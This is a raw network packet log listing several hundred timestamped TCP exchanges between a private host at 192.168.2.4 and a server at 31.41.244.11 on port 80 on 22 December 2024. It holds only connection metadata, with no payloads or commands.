Dec 22, 2024 02:16:30.008027077 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.008126020 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.008167982 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.009126902 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.009181023 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.009212971 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.009257078 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.010217905 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.010272980 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.010376930 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.010420084 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.011348009 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.011390924 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.011476994 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.011514902 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.012517929 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.012567043 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.012614965 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.012655973 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.013567924 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.013608932 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.013658047 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.013698101 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.014672995 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.014713049 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.014765978 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.014807940 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.015778065 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.015816927 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.015886068 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.015927076 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.016917944 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.016968966 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.017009020 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.017070055 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.018021107 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.018071890 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.018292904 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.018342018 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.019146919 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.019197941 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.019279957 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.019328117 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.020437002 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.020457029 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.020493984 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.020509005 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.021393061 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.021444082 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.021805048 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.021853924 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.022495031 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.022546053 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.022610903 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.022650003 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.023622036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.023672104 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.157774925 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.157831907 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.157860994 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.157883883 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.158155918 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.158195019 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.158245087 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.159132957 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.159182072 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.159182072 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.159192085 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.159238100 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.160175085 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.160228014 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.160276890 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.160326958 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.161290884 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.161346912 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.161410093 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.161462069 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.162467003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.162519932 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.162579060 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.162622929 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.163603067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.163646936 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.163727999 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.163770914 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.164673090 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.164710045 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.164717913 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.164752960 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.165797949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.165852070 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.165921926 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.165968895 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.166985035 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.167049885 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.167093992 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.167135000 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.168071032 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.168113947 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.168133020 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.168174982 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.169117928 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.169161081 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.169231892 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.169275045 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.170258045 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.170310020 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.170375109 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.170425892 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.171382904 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.171437025 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.171503067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.171549082 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.172492027 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.172540903 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.172610998 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.172658920 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.173758030 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.173794985 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.173816919 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.173835039 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.174709082 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.174760103 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.174834013 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.174884081 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.175858021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.175908089 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.176057100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.176101923 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.176937103 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.176985025 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.177131891 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.177179098 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.178112984 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.178164959 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.178210974 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.178256989 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.179204941 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.179250002 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.179284096 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.179327011 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.180310011 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.180366993 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.180422068 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.180469036 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.181421995 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.181473017 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.181581020 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.181627035 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.182590961 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.182640076 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.182645082 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.182688951 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.183675051 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.183722019 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.183793068 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.183892965 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.184926033 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.184963942 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.184984922 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.185004950 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.185909986 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.185956955 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.186024904 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.186073065 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.187079906 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.187128067 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.187213898 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.187262058 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.188111067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.188157082 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.188241005 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.188285112 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.189255953 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.189304113 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.189410925 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.189456940 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.190373898 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.190423012 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.190490007 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.190534115 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.191514015 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.191560984 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.191637039 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.191683054 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.192600012 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.192647934 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.192715883 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.192758083 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.193722963 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.193770885 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.193852901 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.193942070 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.194824934 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.195004940 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.196089029 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.196125984 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.197037935 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.197177887 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.197483063 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.198168039 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.198224068 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.198462009 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.198513031 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.199287891 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.199342966 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.199420929 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.199466944 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.200407028 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.200455904 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.200578928 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.200628996 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.201553106 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.201601028 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.201687098 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.201730967 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.202672958 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.202742100 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.202745914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.202796936 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.203783989 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.203830004 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.203902006 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.203960896 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.204946995 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.204998016 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.205044031 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.205101013 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.206041098 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.206090927 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.206162930 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.206207991 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.207146883 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.207199097 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.207247972 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.207294941 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.208256960 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.208302975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.208369017 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.208410978 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.209327936 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.209373951 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.209456921 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.209501028 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.210450888 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.210491896 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.210573912 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.210617065 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.211605072 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.211659908 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.211765051 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.211807013 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.212702990 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.212748051 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.212814093 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.212857962 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.213795900 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.213845015 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.213911057 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.214004993 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.214972019 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.215022087 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.215102911 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.215158939 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.216053009 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.216116905 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.349787951 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.349853992 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.349948883 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.349996090 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.350240946 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.350287914 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.350342989 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.350387096 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.351339102 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.351387024 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.351397038 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.351435900 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.352423906 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.352473021 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.352533102 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.352588892 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.353533983 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.353583097 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.353598118 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.353641033 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.354667902 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.354713917 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.354773998 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.354820013 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.355775118 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.355820894 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.355890036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.355938911 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.356905937 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.356951952 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.357036114 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.357083082 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.358027935 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.358062983 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.358127117 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.358170986 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.359107971 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.359149933 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.359297037 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.359342098 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.360233068 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.360274076 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.360445976 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.360491037 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.361449003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.361485958 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.361498117 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.361531973 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.362495899 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.362539053 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.362689972 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.362785101 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.363575935 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.363624096 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.363686085 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.363729000 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.364721060 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.364768028 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.364900112 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.364943981 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.365856886 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.365900993 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.366045952 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.366089106 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.366929054 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.366976023 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.367130995 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.367176056 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.368065119 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.368109941 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.368206978 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.368257999 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.369182110 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.369226933 CET	49804	80	192.168.2.4	31.41.244.11
